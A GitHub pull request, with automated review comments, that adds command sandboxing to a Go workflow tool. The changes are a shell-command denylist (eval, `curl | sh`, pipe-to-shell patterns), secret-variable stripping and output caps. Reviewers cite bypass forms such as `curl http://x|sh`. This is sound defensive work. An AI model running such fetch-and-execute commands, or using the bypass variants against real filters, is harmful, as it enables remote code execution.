security: tool_command sandboxing — 4 defense-in-depth layers #56
clintecker merged 5 commits into main from
Conversation
…cesses (#16) Adds buildToolEnv() that filters out env vars matching patterns _API_KEY, _SECRET, _TOKEN, _PASSWORD before executing tool node shell commands. Override with TRACKER_PASS_ENV=1 for trusted environments. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
…ching (#16) Adds tool_safety.go with CheckToolCommand, denylist/allowlist pattern matching, and compound statement splitting. More-specific patterns (curl/wget) ordered before generic pipe-to-shell patterns to ensure correct match attribution. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
…(#16)
- ExpandVariables called with toolCommandMode=true — FAIL CLOSED on unsafe ctx.* keys
- CheckToolCommand validates denylist/allowlist on the final command string
- parseByteSize helper + per-node output_limit attr parsed and capped at maxOutputLimit
- ExecCommandWithLimit + buildToolEnv() used for LocalEnvironment; fallback to ExecCommand for other envs
- NewToolHandlerWithConfig constructor for full security configuration
- Integration tests: BlocksTaintedVariable, AllowsSafeVariable, DenylistBlocks

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…ols (#16) Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Walkthrough: Implements tool-command safety — restricts LLM-driven variable expansion in tool_command to a safe-key allowlist, validates commands against a denylist/optional allowlist, caps subprocess output, and strips sensitive environment variables from tool subprocesses.
Sequence Diagram

```mermaid
sequenceDiagram
    participant Client as Tool Node
    participant Handler as ToolHandler.Execute
    participant Expand as ExpandVariables
    participant Validate as CheckToolCommand
    participant FilterEnv as buildToolEnv
    participant Exec as ExecCommandWithLimit
    Client->>Handler: submit tool_command + ctx
    Handler->>Expand: ExpandVariables(..., toolCommandMode=true)
    alt expansion error (unsafe ctx)
        Expand-->>Handler: error (unsafe variable)
        Handler-->>Client: fail (unsafe variable)
    else expanded
        Expand-->>Handler: expanded command
        Handler->>Validate: CheckToolCommand(command, nodeID, allowlist, bypassDenylist)
        alt validation error
            Validate-->>Handler: error (denied/unlisted)
            Handler-->>Client: fail (denied/unlisted)
        else validated
            Validate-->>Handler: ok
            Handler->>FilterEnv: buildToolEnv(osEnv)
            FilterEnv-->>Handler: filtered env
            Handler->>Exec: ExecCommandWithLimit(ctx, cmd, args, timeout, outputLimit, env)
            Exec->>Exec: run process, cap stdout/stderr, append truncation marker if needed
            Exec-->>Handler: CommandResult (capped output)
            Handler-->>Client: success/failure + limited output
        end
    end
```
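The control flow in the diagram can be sketched as a minimal, self-contained Go skeleton. The function names mirror the diagram; the bodies here are simplified hypothetical stand-ins (a toy allowlist and denylist), not the project's actual implementation:

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// expandVariables mimics Layer 1: only a safe-key allowlist of ctx.* keys
// may be interpolated; anything else fails closed.
func expandVariables(cmd string, ctx map[string]string) (string, error) {
	safe := map[string]bool{"outcome": true, "preferred_label": true,
		"human_response": true, "interview_answers": true}
	for key, val := range ctx {
		placeholder := "${ctx." + key + "}"
		if !strings.Contains(cmd, placeholder) {
			continue
		}
		if !safe[key] { // fail closed on LLM-tainted keys
			return "", errors.New("unsafe variable: ctx." + key)
		}
		cmd = strings.ReplaceAll(cmd, placeholder, val)
	}
	return cmd, nil
}

// checkToolCommand mimics Layer 2 with a single toy denylist rule.
func checkToolCommand(cmd string) error {
	if strings.Contains(cmd, "| sh") {
		return errors.New("denied: pipe to shell")
	}
	return nil
}

func runTool(cmd string, ctx map[string]string) (string, error) {
	expanded, err := expandVariables(cmd, ctx)
	if err != nil {
		return "", err // Layer 1: fail closed
	}
	if err := checkToolCommand(expanded); err != nil {
		return "", err // Layer 2: denylist/allowlist
	}
	// Layers 3-4 (env filtering, capped execution) would run here.
	return "ran: " + expanded, nil
}

func main() {
	out, err := runTool("echo ${ctx.outcome}", map[string]string{"outcome": "ok"})
	fmt.Println(out, err)
	_, err = runTool("echo ${ctx.last_response}", map[string]string{"last_response": "x"})
	fmt.Println(err)
}
```

The key property the diagram encodes is ordering: expansion errors short-circuit before validation, and validation errors short-circuit before any process is spawned.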
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~60 minutes
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: cff04ea9e5
```go
if len(p) > remaining {
	p = p[:remaining]
	lb.truncated = true
}
return lb.buf.Write(p)
```
There was a problem hiding this comment.
Return original byte count from limitedBuffer writes
When len(p) > remaining, limitedBuffer.Write truncates p and returns lb.buf.Write(p), which reports fewer bytes than were requested. os/exec streams use io.Copy, and a short write with nil error is treated as io.ErrShortWrite, so tool commands can fail once output crosses the cap boundary instead of being cleanly truncated. This affects any command that emits enough output for a read chunk to exceed the remaining buffer space.
```go
if parsed > h.maxOutputLimit {
	parsed = h.maxOutputLimit
}
outputLimit = parsed
```
Enforce positive output_limit before applying node override
The node-level output_limit override is only clamped on the upper bound; non-positive values are accepted and assigned directly. Because ExecCommandWithLimit treats <= 0 as unbounded, a workflow can set output_limit: 0/negative (or an overflowed negative from large MB inputs) to disable truncation entirely, defeating the intended output-cap safety control.
```go
"* | sh",
"* | bash",
"* | zsh",
```
Broaden pipe-to-shell deny patterns to include shell args
The denylist entries for pipe-to-shell are exact full-statement globs (* | sh, * | bash, etc.), so common variants like cat payload | sh -eux or ... | sh & do not match and pass validation. Since CheckToolCommand anchors matches to the entire statement, these forms bypass the denylist even when it is enabled.
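A whitespace-tolerant regex is one alternative to the exact full-statement globs. This is an illustrative sketch, not the project's matcher: it matches a pipe into `sh`/`bash`/`zsh` (optionally `/bin/`-prefixed) anywhere in a statement, regardless of surrounding spaces or trailing shell arguments:

```go
package main

import (
	"fmt"
	"regexp"
)

// pipeToShell matches "... | sh", "...|sh", "... | sh -eux",
// "... | /bin/bash -", etc., but not commands like "shasum".
var pipeToShell = regexp.MustCompile(`(?i)\|\s*(/bin/)?(sh|bash|zsh)(\s|$)`)

func deniesPipeToShell(stmt string) bool {
	return pipeToShell.MatchString(stmt)
}

func main() {
	fmt.Println(deniesPipeToShell("cat payload | sh -eux")) // matches
	fmt.Println(deniesPipeToShell("curl http://x|sh"))      // matches
	fmt.Println(deniesPipeToShell("ls | shasum"))           // does not match
}
```

The word-boundary requirement (`(\s|$)` after the shell name) avoids false positives on legitimate commands such as `shasum`.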
Actionable comments posted: 4
🧹 Nitpick comments (4)
CLAUDE.md (1)
202-207: Clarify namespace distinction in safe-key documentation. The current text lists `graph.goal` alongside ctx keys, which could imply it's part of the ctx allowlist. It's actually allowed because `graph.*` is a separate namespace that doesn't have LLM-tainted values. Consider rewording for clarity:

```diff
-- Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.
+- Variable expansion in tool_command uses a safe-key allowlist for the `ctx` namespace: only `outcome`, `preferred_label`, `human_response`, and `interview_answers` can be interpolated. The `graph.*` and `params.*` namespaces are unrestricted. All LLM-origin ctx keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.
```

🤖 Prompt for AI Agents: Verify each finding against the current code and only fix it if needed. In `@CLAUDE.md` around lines 202 - 207, update the documentation around the tool_command safe-key allowlist to clearly separate ctx keys from the graph namespace: remove or rephrase the implication that graph.goal is part of the same ctx allowlist and instead state that ctx keys allowed for interpolation are outcome, preferred_label, human_response, and interview_answers, while graph.* (e.g., graph.goal) is a distinct namespace whose values are considered safe because they are not LLM-origin; keep the note that LLM-origin keys (last_response, tool_stdout, response.*, etc.) are blocked and ensure any examples and the sentence listing safe keys explicitly indicate the two namespaces (ctx.* vs graph.*) to avoid confusion.

agent/exec/local.go (1)
191-208: Consider extracting duplicated error handling into a helper. The error handling logic (lines 197-206) is duplicated between the bounded and unbounded code paths (also at lines 217-225). While this is acceptable for a security-critical path where clarity matters, a small helper could reduce duplication.

♻️ Optional: Extract error handling helper

```go
func handleExecError(err error, ctx context.Context, timeout time.Duration, result CommandResult) (CommandResult, error) {
	if err != nil {
		if ctx.Err() != nil {
			return result, fmt.Errorf("command timed out after %v", timeout)
		}
		if exitErr, ok := err.(*exec.ExitError); ok {
			result.ExitCode = exitErr.ExitCode()
			return result, nil
		}
		return result, err
	}
	return result, nil
}
```

🤖 Prompt for AI Agents: Verify each finding against the current code and only fix it if needed. In `@agent/exec/local.go` around lines 191 - 208, extract the duplicated error handling in local command execution into a small helper (e.g., handleExecError) that accepts the error returned from cmd.Run(), the current context (ctx), the timeout, and the current CommandResult, and returns (CommandResult, error); move the logic that checks ctx.Err(), inspects *exec.ExitError to set result.ExitCode, and returns the appropriate result/error into that helper, then replace the duplicated blocks in both the unbounded and bounded code paths (the branches using cmd.Run(), stdout/stderr buffers and the CommandResult struct) with calls to handleExecError to avoid repetition.

pipeline/handlers/tool_safety.go (1)
49-61: Minor: globMatch compiles regex on every call. For a security-critical path, correctness over performance is the right tradeoff. However, if this becomes a hot path, consider caching compiled patterns.

🤖 Prompt for AI Agents: Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool_safety.go` around lines 49 - 61, the globMatch function currently recompiles the regex on every call; change it to cache compiled regexes keyed by the lowercased pattern to avoid repeated regexp.Compile calls. Implement a package-level cache (e.g., a sync.Map or a map protected by a sync.RWMutex) and add a helper like getCompiledGlob(pattern string) *regexp.Regexp that lowercases and transforms the pattern (same QuoteMeta + ReplaceAll logic) and returns the cached *regexp.Regexp or compiles, stores, and returns it; then modify globMatch to use getCompiledGlob and handle nil/compile errors by returning false. Ensure the cache key and transformation match the existing behavior (case-insensitive via strings.ToLower).

pipeline/handlers/tool.go (1)
54-55: Use suffix matching for the secret env filter. The contract here is `*_API_KEY`, `*_SECRET`, `*_TOKEN`, `*_PASSWORD`, but `strings.Contains` also strips names like `AUTH_TOKEN_URL` or `MY_SECRET_MODE`. Narrowing this to suffix matching avoids surprising subprocess breakage while still covering the intended variables.

Proposed refactor

```diff
 for _, pattern := range sensitiveEnvPatterns {
-	if strings.Contains(upper, pattern) {
+	if strings.HasSuffix(upper, pattern) {
 		sensitive = true
 		break
 	}
 }
```

🤖 Prompt for AI Agents: Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 54 - 55, the current secret env filter loops over sensitiveEnvPatterns and uses strings.Contains(upper, pattern), which wrongly matches variables like AUTH_TOKEN_URL; change the check to use suffix matching (strings.HasSuffix) so only names ending with the patterns (e.g. *_API_KEY, *_SECRET, *_TOKEN, *_PASSWORD) are filtered; update the loop in the code that references sensitiveEnvPatterns and the variable upper to call strings.HasSuffix(upper, pattern) instead of strings.Contains.
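The suffix-matching filter proposed above can be sketched as a self-contained example. The function and pattern names here are hypothetical mirrors of what the review describes, not the project's actual `buildToolEnv`:

```go
package main

import (
	"fmt"
	"strings"
)

// Suffixes the review names as the intended contract.
var sensitiveEnvSuffixes = []string{"_API_KEY", "_SECRET", "_TOKEN", "_PASSWORD"}

// filterEnv drops variables whose names END with a sensitive suffix,
// so AWS_SECRET is stripped but AUTH_TOKEN_URL survives.
func filterEnv(environ []string) []string {
	var out []string
	for _, kv := range environ {
		name, _, _ := strings.Cut(kv, "=")
		upper := strings.ToUpper(name)
		sensitive := false
		for _, suffix := range sensitiveEnvSuffixes {
			if strings.HasSuffix(upper, suffix) {
				sensitive = true
				break
			}
		}
		if !sensitive {
			out = append(out, kv)
		}
	}
	return out
}

func main() {
	env := []string{"PATH=/usr/bin", "AWS_SECRET=x", "AUTH_TOKEN_URL=https://a"}
	fmt.Println(filterEnv(env))
}
```

The behavioral difference from `strings.Contains` is exactly the `AUTH_TOKEN_URL` case: a substring match strips it, a suffix match keeps it.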
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@pipeline/handlers/tool.go`:
- Around line 90-105: The code sets outputLimit from cfg.OutputLimit and
separately computes maxLimit from cfg.MaxOutputLimit but never enforces maxLimit
on outputLimit; update the initialization logic in the ToolHandler construction
(around outputLimit/maxLimit) so you first set outputLimit = cfg.OutputLimit (or
DefaultOutputLimit if <=0), set maxLimit = cfg.MaxOutputLimit (or MaxOutputLimit
if <=0), then clamp outputLimit = min(outputLimit, maxLimit) before returning
the new ToolHandler instance (references: cfg.OutputLimit, cfg.MaxOutputLimit,
DefaultOutputLimit, MaxOutputLimit, outputLimit, maxLimit, ToolHandler).
- Around line 187-196: After parsing node.Attrs["output_limit"] via
parseByteSize in the handler, validate that the parsed value is strictly
positive and return an error if parsed <= 0 (so non-positive values like "0" or
negatives are rejected); then apply the existing cap against h.maxOutputLimit
and set outputLimit. Reference parseByteSize, node.Attrs["output_limit"],
h.maxOutputLimit, outputLimit and ExecCommandWithLimit/limitedWriter to locate
where to add the parsed <= 0 check and error return.
- Around line 46-47: The current check if os.Getenv("TRACKER_PASS_ENV") != ""
allows any non-empty value (e.g., "0" or "false") to bypass env stripping;
change the condition to require the explicit value "1" (e.g.,
os.Getenv("TRACKER_PASS_ENV") == "1") before returning os.Environ() so only
TRACKER_PASS_ENV=1 disables filtering; update the branch that returns
os.Environ() and any related comments to reflect this stricter contract.
- Around line 198-205: The current else branch calls h.env.ExecCommand and thus
skips output capping and filtered env; replace that fallback with a fail-closed
check: define a local interface type that declares ExecCommandWithLimit
(matching exec.LocalEnvironment.ExecCommandWithLimit signature) and attempt a
type assertion on h.env; if it implements the limited call, invoke
ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit,
buildToolEnv()), otherwise return an error from the handler indicating the
environment does not support limited execution (do not call ExecCommand). Update
references: h.env, exec.LocalEnvironment, ExecCommandWithLimit, ExecCommand,
buildToolEnv, outputLimit, timeout.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Pro
Run ID: 62246804-0d06-4064-ae68-175a0d56b2e5
📒 Files selected for processing (9)
CLAUDE.md, agent/exec/env_test.go, agent/exec/local.go, pipeline/expand.go, pipeline/expand_test.go, pipeline/handlers/tool.go, pipeline/handlers/tool_safety.go, pipeline/handlers/tool_safety_test.go, pipeline/handlers/tool_test.go
```go
if limitStr, ok := node.Attrs["output_limit"]; ok && limitStr != "" {
	parsed, err := parseByteSize(limitStr)
	if err != nil {
		return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: %w", node.ID, limitStr, err)
	}
	if parsed > h.maxOutputLimit {
		parsed = h.maxOutputLimit
	}
	outputLimit = parsed
}
```
Reject non-positive output_limit values.
parseByteSize("0") and negative inputs currently flow into ExecCommandWithLimit unchanged. That makes the cap depend on limitedWriter edge-case behavior instead of enforcing a positive bound here.
Proposed fix

```diff
 if limitStr, ok := node.Attrs["output_limit"]; ok && limitStr != "" {
 	parsed, err := parseByteSize(limitStr)
 	if err != nil {
 		return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: %w", node.ID, limitStr, err)
 	}
+	if parsed <= 0 {
+		return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: must be > 0", node.ID, limitStr)
+	}
 	if parsed > h.maxOutputLimit {
 		parsed = h.maxOutputLimit
 	}
 	outputLimit = parsed
 }
```

🤖 Prompt for AI Agents:
Verify each finding against the current code and only fix it if needed.
In `@pipeline/handlers/tool.go` around lines 187 - 196, After parsing
node.Attrs["output_limit"] via parseByteSize in the handler, validate that the
parsed value is strictly positive and return an error if parsed <= 0 (so
non-positive values like "0" or negatives are rejected); then apply the existing
cap against h.maxOutputLimit and set outputLimit. Reference parseByteSize,
node.Attrs["output_limit"], h.maxOutputLimit, outputLimit and
ExecCommandWithLimit/limitedWriter to locate where to add the parsed <= 0 check
and error return.
```go
// Layer 4: Use ExecCommandWithLimit with buildToolEnv() when running on LocalEnvironment.
// For other ExecutionEnvironment implementations (e.g. mock, remote), fall back to ExecCommand.
var result exec.CommandResult
if le, ok := h.env.(*exec.LocalEnvironment); ok {
	result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv())
} else {
	result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout)
}
```
Don’t silently drop the new safeguards on non-local environments.
Per agent/exec/env.go:17-25, ExecutionEnvironment does not expose a limited-exec API, so this else branch skips both output capping and filtered-env execution. agent/exec/local.go:93-137 is currently the only implementation that enforces those protections, which means SSH/container/mock environments fall back to the old behavior here.
Minimal fail-closed alternative

```diff
 if le, ok := h.env.(*exec.LocalEnvironment); ok {
 	result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv())
 } else {
-	result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout)
+	return pipeline.Outcome{}, fmt.Errorf(
+		"node %q execution environment %T does not support limited tool_command execution",
+		node.ID, h.env,
+	)
 }
```

🤖 Prompt for AI Agents:
Verify each finding against the current code and only fix it if needed.
In `@pipeline/handlers/tool.go` around lines 198 - 205, The current else branch
calls h.env.ExecCommand and thus skips output capping and filtered env; replace
that fallback with a fail-closed check: define a local interface type that
declares ExecCommandWithLimit (matching
exec.LocalEnvironment.ExecCommandWithLimit signature) and attempt a type
assertion on h.env; if it implements the limited call, invoke
ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit,
buildToolEnv()), otherwise return an error from the handler indicating the
environment does not support limited execution (do not call ExecCommand). Update
references: h.env, exec.LocalEnvironment, ExecCommandWithLimit, ExecCommand,
buildToolEnv, outputLimit, timeout.
Pull request overview
Implements defense-in-depth hardening for tool_command execution in the pipeline tool handler to reduce shell injection risk and limit damage/exfiltration from malicious .dip graphs or LLM-derived content.
Changes:
- Adds a fail-closed allowlist for `${ctx.*}` interpolation when expanding `tool_command`.
- Introduces per-stream stdout/stderr output caps (default 64KB; configurable with a hard ceiling) via a new `ExecCommandWithLimit`.
- Adds command denylist + optional allowlist validation and strips sensitive env vars for local tool subprocesses.
Reviewed changes
Copilot reviewed 9 out of 9 changed files in this pull request and generated 8 comments.
Show a summary per file
| File | Description |
|---|---|
| `pipeline/handlers/tool.go` | Wires variable-expansion allowlist, command safety checks, output limiting, and env stripping into tool execution. |
| `pipeline/handlers/tool_test.go` | Adds tests for env stripping and tool handler security behavior (tainted ctx keys, denylist). |
| `pipeline/handlers/tool_safety.go` | Implements denylist/allowlist matching for tool commands (per-statement). |
| `pipeline/handlers/tool_safety_test.go` | Unit tests for statement splitting + denylist/allowlist behavior. |
| `pipeline/expand.go` | Adds toolCommandMode to restrict `${ctx.*}` expansion to a safe allowlist. |
| `pipeline/expand_test.go` | Adds tests confirming tool-command mode blocks unsafe ctx keys and allows safe ones. |
| `CLAUDE.md` | Documents the new tool safety controls and recommended usage patterns. |
| `agent/exec/local.go` | Adds ExecCommandWithLimit and a thread-safe limited buffer to cap output capture. |
| `agent/exec/env_test.go` | Adds tests validating truncation behavior and custom env support for ExecCommandWithLimit. |
```go
if strings.HasSuffix(upper, "MB") {
	n, err := strconv.Atoi(strings.TrimSuffix(upper, "MB"))
	return n * 1024 * 1024, err
}
if strings.HasSuffix(upper, "KB") {
	n, err := strconv.Atoi(strings.TrimSuffix(upper, "KB"))
	return n * 1024, err
}
return strconv.Atoi(s)
```
parseByteSize + output_limit handling allows negative values (e.g. "-1", "-1MB"), which later makes outputLimit <= 0 and disables output limiting in ExecCommandWithLimit. This undermines the output-cap security layer; treat non-positive parsed limits as invalid and return an error (or clamp to a minimum of 1). Also consider using int64 and validating before multiplying to avoid overflow on 32-bit platforms.
Suggested change:

```diff
-if strings.HasSuffix(upper, "MB") {
-	n, err := strconv.Atoi(strings.TrimSuffix(upper, "MB"))
-	return n * 1024 * 1024, err
-}
-if strings.HasSuffix(upper, "KB") {
-	n, err := strconv.Atoi(strings.TrimSuffix(upper, "KB"))
-	return n * 1024, err
-}
-return strconv.Atoi(s)
+maxInt := int64(^uint(0) >> 1)
+parseWithMultiplier := func(raw string, multiplier int64) (int, error) {
+	n, err := strconv.ParseInt(strings.TrimSpace(raw), 10, 64)
+	if err != nil {
+		return 0, err
+	}
+	if n <= 0 {
+		return 0, fmt.Errorf("byte size must be greater than zero")
+	}
+	if n > maxInt/multiplier {
+		return 0, fmt.Errorf("byte size %q overflows", s)
+	}
+	total := n * multiplier
+	if total > maxInt {
+		return 0, fmt.Errorf("byte size %q overflows", s)
+	}
+	return int(total), nil
+}
+if strings.HasSuffix(upper, "MB") {
+	return parseWithMultiplier(strings.TrimSuffix(upper, "MB"), 1024*1024)
+}
+if strings.HasSuffix(upper, "KB") {
+	return parseWithMultiplier(strings.TrimSuffix(upper, "KB"), 1024)
+}
+return parseWithMultiplier(s, 1)
```
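A self-contained version of an overflow-safe `parseByteSize` along these lines can be sketched as follows (illustrative; the real function's surrounding signature and error wording may differ):

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseByteSize parses "64KB"-style sizes, rejecting non-positive values
// and guarding the multiplication against int overflow.
func parseByteSize(s string) (int, error) {
	upper := strings.ToUpper(strings.TrimSpace(s))
	multiplier := int64(1)
	switch {
	case strings.HasSuffix(upper, "MB"):
		upper, multiplier = strings.TrimSuffix(upper, "MB"), 1024*1024
	case strings.HasSuffix(upper, "KB"):
		upper, multiplier = strings.TrimSuffix(upper, "KB"), 1024
	}
	n, err := strconv.ParseInt(strings.TrimSpace(upper), 10, 64)
	if err != nil {
		return 0, err
	}
	if n <= 0 {
		return 0, fmt.Errorf("byte size %q must be greater than zero", s)
	}
	maxInt := int64(^uint(0) >> 1) // platform int max
	if n > maxInt/multiplier {
		return 0, fmt.Errorf("byte size %q overflows", s)
	}
	return int(n * multiplier), nil
}

func main() {
	fmt.Println(parseByteSize("64KB")) // 65536 <nil>
	fmt.Println(parseByteSize("-1MB")) // rejected with an error
}
```

Validating `n <= 0` before multiplying is what closes the "negative size disables the cap" hole, and dividing `maxInt` by the multiplier checks for overflow without performing it.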
```go
// NewToolHandlerWithConfig creates a ToolHandler with full security configuration.
func NewToolHandlerWithConfig(env exec.ExecutionEnvironment, cfg ToolHandlerConfig) *ToolHandler {
	outputLimit := cfg.OutputLimit
	if outputLimit <= 0 {
		outputLimit = DefaultOutputLimit
	}
	maxLimit := cfg.MaxOutputLimit
	if maxLimit <= 0 {
		maxLimit = MaxOutputLimit
	}
	return &ToolHandler{
		env:            env,
		defaultTimeout: defaultToolTimeout,
		outputLimit:    outputLimit,
		maxOutputLimit: maxLimit,
		allowlist:      cfg.Allowlist,
		bypassDenylist: cfg.BypassDenylist,
	}
}
```
NewToolHandlerWithConfig does not enforce OutputLimit <= MaxOutputLimit. If cfg.OutputLimit is set higher than cfg.MaxOutputLimit, the default per-node limit (when output_limit attr is omitted) can exceed the intended hard ceiling. Consider clamping outputLimit to maxLimit (or returning an error) when building the handler config.
pipeline/handlers/tool.go (Outdated)

```diff
@@ -72,6 +168,11 @@ func (h *ToolHandler) Execute(ctx context.Context, node *pipeline.Node, pctx *pi
 	command = fmt.Sprintf("cd %q && %s", cleaned, command)
 }

+// Layer 2: Denylist/allowlist check on the FINAL command string (after working_dir prepend).
+if err := CheckToolCommand(command, node.ID, h.allowlist, h.bypassDenylist); err != nil {
+	return pipeline.Outcome{}, err
+}
```
CheckToolCommand is run after prepending the working_dir wrapper ("cd ... &&"). Because allowlist matching is per-statement, enabling an allowlist will now require patterns for the injected "cd" statement as well, which is surprising and can break previously-allowed commands. Consider validating allowlist/denylist against the user-authored command before adding the working_dir prefix (or explicitly exempt/allow the injected "cd" statement).
```go
// defaultDenyPatterns are blocked in all tool_command executions.
// Cannot be overridden by .dip graph attrs. Only --bypass-denylist CLI flag disables them.
// Patterns use * as wildcard. Matching is case-insensitive, per-statement.
var defaultDenyPatterns = []string{
	"eval *",
	"exec *",
	"source *",
	". /*",
	"curl * | *",
	"wget * | *",
	"* | sh",
	"* | bash",
	"* | zsh",
	"* | /bin/sh",
	"* | /bin/bash",
	"* | sh -",
	"* | bash -",
}
```
The denylist patterns are brittle to whitespace variations and can be bypassed (e.g. `curl http://x|sh` won't match `curl * | *` / `* | sh` due to missing spaces; `eval\tfoo` won't match `eval *`; and the current `. /*` pattern blocks only absolute paths, not the common `. ./script.sh` form). Since this is a security layer, consider switching to token/regex-based matching that tolerates arbitrary whitespace (and explicitly covers `. *` / `. ./*`), rather than simple space-sensitive globs.
CLAUDE.md (Outdated)

```diff
 ### Tool node safety — LLM output as shell input
 - NEVER `eval` content extracted from LLM-written files (arbitrary command execution)
 - Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.
```
This doc line claims tool_command interpolation allows only specific ctx keys plus "graph.goal", but the implementation only restricts ctx.* and allows any ${graph.*} key in toolCommandMode. Either update the doc to reflect that all graph attrs are allowed, or tighten the implementation to match the documented contract.
Suggested change:

```diff
-- Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.
+- Variable expansion in `tool_command` uses a safe-key allowlist for context values: only `outcome`, `preferred_label`, `human_response`, and `interview_answers` may be interpolated from `ctx.*`. Graph attribute interpolation is allowed via `${graph.*}` (including, but not limited to, `${graph.goal}`). LLM-origin context keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.
```
```go
func TestToolHandler_BlocksTaintedVariable(t *testing.T) {
	env := exec.NewLocalEnvironment(t.TempDir())
	h := NewToolHandler(env)
	node := &pipeline.Node{
```
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. Elsewhere in this file toolTestEnv() is used to keep tests passing in sandboxed environments without sh; consider switching to toolTestEnv() (or skipping when sh is unavailable) for consistency and CI portability.
```go
func TestToolHandler_AllowsSafeVariable(t *testing.T) {
	env := exec.NewLocalEnvironment(t.TempDir())
	h := NewToolHandler(env)
	node := &pipeline.Node{
```
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. For portability (matching the rest of this file), consider using toolTestEnv() or skipping when sh is unavailable.
```go
func TestToolHandler_DenylistBlocks(t *testing.T) {
	env := exec.NewLocalEnvironment(t.TempDir())
	h := NewToolHandler(env)
	node := &pipeline.Node{
```
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. For portability (matching the rest of this file), consider using toolTestEnv() or skipping when sh is unavailable.
…imit, denylist, env, tests
- limitedBuffer.Write returns len(p) on truncation (not short write)
- TRACKER_PASS_ENV checks for "1" not just non-empty
- OutputLimit clamped to MaxOutputLimit in constructor
- Non-positive output_limit node attr rejected with error
- Denylist check moved before working_dir prepend (allowlist doesn't need cd patterns)
- Broadened denylist: `. ./*`, `* | sh *`, `* | bash *`, etc.
- CLAUDE.md: documents all graph.*/params.* allowed, not just graph.goal
- Tests use toolTestEnv() for CI portability

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
pipeline/handlers/tool.go (1)

169-177: ⚠️ Potential issue | 🟠 Major — Constrain `working_dir` to the execution root.

`filepath.Clean` plus a raw `..` substring check is not enough here. Absolute paths, `working_dir="-"`, and symlinked directories all survive this guard, and line 177 then prepends a shell `cd` that changes where an otherwise-validated command runs. Resolve the directory against the intended execution root, reject escapes after symlink resolution, and use `cd --` for the final hop.

🤖 Prompt for AI Agents: Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 169 - 177, the working_dir validation in the tool handler is insufficient: instead of only filepath.Clean + substring checks, resolve the provided working_dir (node.Attrs["working_dir"]) against the execution root, reject absolute paths or paths that escape the execution root after evaluating symlinks (use filepath.Join(execRoot, wd) then filepath.EvalSymlinks and ensure the result has execRoot as its prefix), treat weird names like "-" as invalid, and if accepted build the shell change directory with a safe form using "cd -- <cleanedRelPath> && <command>" (update the code that produces command and the error returns of pipeline.Outcome{} to use these stronger checks and explicit rejection messages).
♻️ Duplicate comments (1)
pipeline/handlers/tool.go (1)
205-212: ⚠️ Potential issue | 🟠 Major

Fail closed when limited execution is unavailable.

Line 211 still falls back to `ExecCommand`, which drops both the capped buffers and `buildToolEnv()` filtering for every non-local environment. That makes the new safety guarantees environment-dependent again. Prefer asserting on a small `ExecCommandWithLimit` interface and returning an error when the environment cannot provide it.

Possible fix:

```diff
+type limitedExecEnvironment interface {
+	ExecCommandWithLimit(context.Context, string, []string, time.Duration, int, ...[]string) (exec.CommandResult, error)
+}
+
 var result exec.CommandResult
-if le, ok := h.env.(*exec.LocalEnvironment); ok {
+if le, ok := h.env.(limitedExecEnvironment); ok {
 	result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv())
 } else {
-	result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout)
+	return pipeline.Outcome{}, fmt.Errorf(
+		"node %q execution environment %T does not support limited tool_command execution",
+		node.ID, h.env,
+	)
 }
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 205 - 212, The current branch falls back to h.env.ExecCommand, losing outputLimit and buildToolEnv protections; instead define and assert a small interface (e.g., type limitedExecutor interface { ExecCommandWithLimit(context.Context, string, []string, time.Duration, int, map[string]string) (exec.CommandResult, error) }) and check h.env against it (similar to the LocalEnvironment check); if the assertion fails return an error explaining that limited execution is required, otherwise call ExecCommandWithLimit with timeout, outputLimit and buildToolEnv(); update references to exec.CommandResult, buildToolEnv, LocalEnvironment and h.env in the implementation accordingly.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Pro
Run ID: e268aeb0-db4e-43c6-af34-73ed3f30352b
